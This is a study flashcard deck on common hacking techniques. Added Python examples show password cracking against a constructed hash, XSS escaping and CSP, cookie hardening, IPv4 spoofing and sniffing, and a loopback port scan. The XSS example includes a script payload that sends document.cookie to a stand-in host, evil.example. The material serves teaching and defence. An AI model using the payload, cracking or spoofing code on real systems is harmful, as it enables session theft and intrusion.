8.1.3 Hackers

Cards (78)

  • Hackers use many techniques; name 9 of them:
    Social Engineering
    Phishing
    SQL Injection
    Cross-site Scripting
    Brute Force Attack
    DDoS
    Shoulder surfing
    MitM
    DNS hijacking
  • Social engineering is manipulating a person into revealing information (or taking an action) they otherwise wouldn't
  • SQL injection is:
    Gaining unauthorized access to a database by supplying input that is concatenated into a SQL query, so that the attacker's text is executed as part of the query
  • Cross-site scripting is:
    Where a website places attacker-supplied input into a page without encoding it, so the attacker's script runs in other users' browsers
  • Brute force attacking is:
    Repeating a technique until it works, such as trying every possible password in turn
  • DDoS or Distributed Denial of Service is:
    Using a botnet (many compromised hosts) to flood a server with traffic so that it can no longer serve legitimate users
  • Shoulder surfing is:
    Viewing another person's screen or keyboard to obtain sensitive data
  • A man-in-the-middle attack is:
    A threat actor positions themselves between two communicating parties (for example a client and a server) so that their traffic passes through the attacker, who then views, alters or stores the data being transferred
  • DNS hijacking is:
    DNS resolution is tampered with (a compromised resolver, altered records, or a changed resolver setting on the host) so that when the user requests a legitimate website they are sent to a malicious one instead.
  • A dictionary password attack is:
    Using a list of common words (or passwords previously leaked for the account) as guesses, rather than trying every possible combination
  • Is a brute force or dictionary password attack more likely to be automated?
    Brute force (both are normally run by tools, but a brute force search is far too large to attempt by hand)
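Added example (not from the deck) contrasting the two attacks against a constructed salted SHA-256 hash: the dictionary attack walks a short stand-in wordlist, the brute force attack enumerates every lowercase string up to a length limit within an attempt budget. The wordlist, salt, budget and function names are assumptions for the illustration; a real password store should use a slow hash such as bcrypt or Argon2, which is precisely what makes both attacks expensive.

```python
import hashlib
import itertools
import string

# Constructed stand-in for a leaked-password list such as rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon", "monkey", "football"]


def hash_password(password, salt):
    """Salted SHA-256, used here only so the demo runs fast (not a recommendation)."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


def dictionary_attack(target_hash, salt, wordlist=WORDLIST):
    """Try each wordlist entry in order. Returns (password, attempts) or (None, attempts)."""
    for attempts, word in enumerate(wordlist, start=1):
        if hash_password(word, salt) == target_hash:
            return word, attempts
    return None, len(wordlist)


def brute_force_attack(target_hash, salt, alphabet=string.ascii_lowercase,
                       max_len=4, budget=500_000):
    """Enumerate every string over `alphabet` of length 1..max_len, giving up when
    the attempt budget is spent. Returns (password, attempts) or (None, attempts)."""
    attempts = 0
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            if attempts >= budget:
                return None, attempts
            attempts += 1
            candidate = "".join(chars)
            if hash_password(candidate, salt) == target_hash:
                return candidate, attempts
    return None, attempts


def keyspace(alphabet_size, max_len):
    """Number of candidates of length 1..max_len: the work a full brute force faces."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    salt = "s4lt"
    print("dictionary vs 'dragon':", dictionary_attack(hash_password("dragon", salt), salt))
    print("brute force vs 'cat':", brute_force_attack(hash_password("cat", salt), salt))
    print("brute force vs 'dragon':", brute_force_attack(hash_password("dragon", salt), salt))
    print("lowercase keyspace up to 8 chars:", keyspace(26, 8))
```

Against `dragon` the dictionary succeeds on its fifth guess while the brute force exhausts all 475,254 lowercase strings of up to four characters and still fails; against a three-letter password the brute force wins in a couple of thousand attempts. That asymmetry is why wordlists are tried first and why length matters more than character variety.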
  • To avoid XSS attacks, web developers should implement security measures such as validating input data, sanitising user input, and using Content Security Policy (CSP). Validating input data checks that it has the expected format and meets the field's requirements. Sanitising (or encoding) user input before it is placed in a page removes or neutralises any markup or script it contains. CSP lets the site specify which sources the browser may load scripts and other content from, so injected inline script is blocked even if it reaches the page.
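Added example (not from the original deck) of the three measures in Python: a format check for input validation, output encoding with `html.escape` as the sanitisation step, and a CSP header value. The comment-rendering functions, the username format and the policy string are assumptions for the illustration.

```python
import html
import re

# Input validation: a username field only needs letters, digits and underscore.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate_username(value):
    """Reject anything that does not match the format the field requires."""
    return USERNAME_RE.fullmatch(value) is not None


def render_comment_unsafe(author, text):
    """Vulnerable: untrusted input is placed straight into the HTML, so any
    markup or <script> in it is interpreted by the browser."""
    return f"<p><b>{author}</b>: {text}</p>"


def render_comment_safe(author, text):
    """Output encoding: <, >, &, and quotes become entities and are shown as text."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


def csp_header():
    """Policy allowing scripts only from the site's own origin; an injected
    inline <script> that reaches the page is refused by the browser."""
    return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"


def contains_active_markup(rendered):
    """Constructed check: does the rendered HTML still carry a raw script tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    payload = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
    print(render_comment_unsafe("mallory", payload))
    print(render_comment_safe("mallory", payload))
    print("Content-Security-Policy:", csp_header())
```

Validation and encoding are separate layers: the username check stops bad data at the boundary, the escaping makes whatever does get stored harmless when displayed, and the CSP is the backstop for the case where the first two were missed somewhere.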
  • Bait-and-switch is:
    Where a hacker offers something attractive that is actually malicious, such as a free download that contains malware
  • Cookie theft/session hijacking is:
    Stealing a user's session cookie, which lets the attacker use that session and gain unauthorised access to the user's data without knowing their password
  • How is cookie theft usually done?
    Intercepting cookies as they are transmitted (or reading them with injected script), then replaying the session data they contain
  • Why are cookies targeted by hackers?
    They contain session IDs, authentication tokens and other sensitive data
  • Fake WAP (wireless access point) attacks are:
    An access point is set up to impersonate a legitimate network so that victims connect through it, usually to facilitate man-in-the-middle attacks
  • Clickjacking is:
    Placing hidden (transparent) elements over visible elements on a webpage so the user clicks something other than what they see
  • Clickjacking two example situations:
    A hidden Like button placed over a visible control, so clicking it boosts a social media post
    A pharming-style page that reuses the legitimate website's own code, with the hidden overlay added on top of it
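Added example (not from the deck) that ties the cookie-theft and clickjacking cards to the server-side controls that blunt them: a session cookie issued with HttpOnly, Secure and SameSite, and the two anti-framing headers. `audit_response` is a constructed check that reports which of those protections a response is missing. Header values, the cookie name and the function names are assumptions for the illustration.

```python
import secrets
from http import cookies


def new_session_cookie(name="session"):
    """Issue a session identifier with the attributes that limit cookie theft."""
    token = secrets.token_urlsafe(32)   # 256 random bits: not guessable
    jar = cookies.SimpleCookie()
    jar[name] = token
    jar[name]["httponly"] = True        # page script cannot read it (XSS theft)
    jar[name]["secure"] = True          # only sent over HTTPS (sniffing in transit)
    jar[name]["samesite"] = "Lax"       # not attached to cross-site requests
    jar[name]["path"] = "/"
    return token, jar.output(header="Set-Cookie:")


def anti_clickjacking_headers():
    """Refuse to be framed: the older header and the CSP directive that replaces it."""
    return {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors 'none'",
    }


def audit_response(headers, set_cookie):
    """Constructed check: list the protections a response is missing."""
    missing = []
    for attr in ("HttpOnly", "Secure", "SameSite="):
        if attr not in set_cookie:
            missing.append(attr.rstrip("="))
    csp = headers.get("Content-Security-Policy", "")
    if "X-Frame-Options" not in headers and "frame-ancestors" not in csp:
        missing.append("anti-framing header")
    return missing


if __name__ == "__main__":
    token, cookie_header = new_session_cookie()
    print(cookie_header)
    print("weak response missing:", audit_response({}, "Set-Cookie: session=abc123"))
    print("hardened response missing:", audit_response(anti_clickjacking_headers(), cookie_header))
```

None of these attributes stops a page with an XSS bug from acting on the user's behalf, but HttpOnly does stop the cookie itself being exfiltrated, Secure stops a sniffer on the path from seeing it, and the framing headers make the overlay trick impossible because the site will not render inside another origin's frame.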
  • A waterhole attack is:
    Compromising a website that the target users often visit, so that visiting it installs malware on their systems and gives the attacker unauthorised access
  • Why is a waterhole attack named that?
    It is similar to the tactic used in the wild, where a predator waits near a waterhole for its prey to come and drink, attacking them when they are vulnerable.
  • DoS and MitM attacks are both examples of threat actor attack types; name 5 more:
    Sniffer
    Password
    IP spoofing
    Eavesdropping
    Data modification
  • A sniffer is an application or device that reads packets passing through it in real time
  • Sniffers are protected against with encryption: captured packets then reveal only ciphertext
  • Password-based attacks are where a threat actor tries to guess or brute force a password in order to gain higher-level access
  • IP address spoofing is where a threat actor constructs an IP packet that appears to originate from a valid address inside the corporate network
  • A data modification attack is modifying enterprise traffic in transit to introduce a malicious payload into the network.
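Added example (not from the deck) covering the sniffer, IP spoofing and data-modification cards together: it builds an IPv4 packet whose source address is chosen freely by the sender, decodes it the way a sniffer would, pulls a constructed plaintext credential out of the payload, and shows that an in-path attacker who modifies the packet simply recomputes the checksum. Sending the spoofed packet would need a raw socket and privileges; this example only constructs and parses bytes. All addresses and payloads are made up for the illustration.

```python
import re
import socket
import struct

# version/IHL, TOS, total length, ID, flags/frag, TTL, proto, checksum, src, dst
IPV4_HDR = "!BBHHHBBH4s4s"


def ip_checksum(header):
    """RFC 1071 one's-complement sum over the header; 0 when a valid checksum is included."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, payload, proto=17, ttl=64, ident=0x1234):
    """Assemble an IPv4 packet. `src` is whatever the sender writes: nothing in
    the header proves it, which is all IP spoofing is."""
    hdr = struct.pack(IPV4_HDR, 0x45, 0, 20 + len(payload), ident, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def parse_ipv4(packet):
    """What a sniffer does with a captured packet: decode header fields and payload."""
    fields = struct.unpack(IPV4_HDR, packet[:20])
    ihl = (fields[0] & 0x0F) * 4
    return {
        "src": socket.inet_ntoa(fields[8]),
        "dst": socket.inet_ntoa(fields[9]),
        "proto": fields[6],
        "ttl": fields[5],
        "checksum_ok": ip_checksum(packet[:ihl]) == 0,
        "payload": packet[ihl:fields[2]],
    }


def find_credentials(payload):
    """Sniffer credential grab: only works when the payload is plaintext."""
    match = re.search(rb"pass(?:word)?=([^&\s]+)", payload)
    return match.group(1).decode() if match else None


def modify_payload(packet, new_payload):
    """Data modification in transit: swap the payload and recompute length and
    checksum, so the receiver sees a perfectly valid packet."""
    info = parse_ipv4(packet)
    return build_ipv4(info["src"], info["dst"], new_payload,
                      proto=info["proto"], ttl=info["ttl"])


if __name__ == "__main__":
    # Constructed: a packet claiming to come from an internal host, carrying a plaintext login.
    pkt = build_ipv4("10.0.0.5", "10.0.0.1", b"user=admin&pass=hunter2")
    print(parse_ipv4(pkt))
    print("captured password:", find_credentials(parse_ipv4(pkt)["payload"]))
    print("after modification:", parse_ipv4(modify_payload(pkt, b"user=admin&pass=pwned")))
```

The header checksum is there to catch corruption, not tampering: anyone who can rewrite the packet can rewrite the checksum too. Integrity against an in-path attacker has to come from a layer above IP (TLS, IPsec), which is also what turns the payload the sniffer sees into ciphertext.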
  • Networks are susceptible to the following types of attack:
    Reconnaissance
    Access
    DoS
  • 5 techniques used in reconnaissance attacks are:
    Perform an information query on the target (e.g. whois, DNS lookups)
    Ping sweep the target network to find live hosts
    Initiate a port scan of the active IP addresses
    Run vulnerability scanners against the open services
    Run exploitation tools
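Added example (not from the deck) of the port-scan step as a TCP connect scan in Python. To keep it runnable offline it starts its own listening socket on a loopback port and scans that port together with one it knows is closed; a real scan would target the hosts found by the ping sweep (which needs raw ICMP sockets and privileges, so it is not shown here). Host, port selection and timeout values are assumptions for the illustration.

```python
import socket
import threading


def start_listener(host="127.0.0.1"):
    """Constructed target: a TCP service on an ephemeral loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed: stop serving
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def free_closed_port(host="127.0.0.1"):
    """Pick a port nothing is listening on, by binding it and releasing it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def tcp_connect_scan(host, ports, timeout=0.2):
    """Full TCP handshake per port: open ports accept, closed ones refuse or time out."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 means the connection succeeded
                open_ports.append(port)
    return open_ports


def demo():
    """Scan one known-open and one known-closed loopback port; returns (found, expected)."""
    srv, open_port = start_listener()
    closed_port = free_closed_port()
    try:
        return tcp_connect_scan("127.0.0.1", [closed_port, open_port]), open_port
    finally:
        srv.close()


if __name__ == "__main__":
    found, expected = demo()
    print(f"open ports found: {found} (listener on {expected})")
```

A connect scan completes the handshake, so every probe shows up in the target's application logs; that noisiness is why tools such as nmap default to a half-open (SYN) scan when they have raw-socket privileges, and why a burst of connections to many ports from one source is a reliable detection signal for the recon phase.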
  • Reconnaissance attacks precede access or DoS attacks
  • Threat actors use recon attacks to understand and map a system
  • Access attacks exploit known vulnerabilities of a system to gain entry, retrieve data, or escalate privileges to admin level
  • Password attacks are where threat actors attempt to discover passwords, generally of some importance
  • Spoofing attacks are where a threat actor device attempts to pose as another device by falsifying data.
  • Spoofing attacks include:
    MAC spoofing
    DHCP spoofing
    IP spoofing
  • 4 other access attacks:
    MitM - intercepting traffic such as sensitive info or passwords
    Trust exploitation - the threat actor compromises a host that the target trusts, and uses that trust relationship to gain access
    Buffer overflow - writing more data into a buffer than it can hold, to crash the program or run attacker-supplied code
    Port redirection - using a compromised host to relay traffic through a firewall to an internal host that is otherwise unreachable
  • SET stands for?
    Social-Engineer Toolkit
  • SET was designed to help white hat hackers and other network security personnel create social engineering attacks to test their own networks.
  • IP doesn't validate whether a packet actually came from its claimed source. Threat actors can therefore send packets using a spoofed source IP address
  • IP attack techniques:
    ICMP - use ICMP echo requests (pings) to discover subnets and hosts
    Amplification and reflection - bounce traffic off third-party servers that reply with larger responses, overwhelming the victim and preventing legitimate users from accessing information
    Address spoofing - forge the source address in an IP packet, for example in blind spoofing
    MITM - transparently monitor, capture, and control communication
    Session hijacking - threat actors gain access to the physical network and then use a MitM attack to take over an established session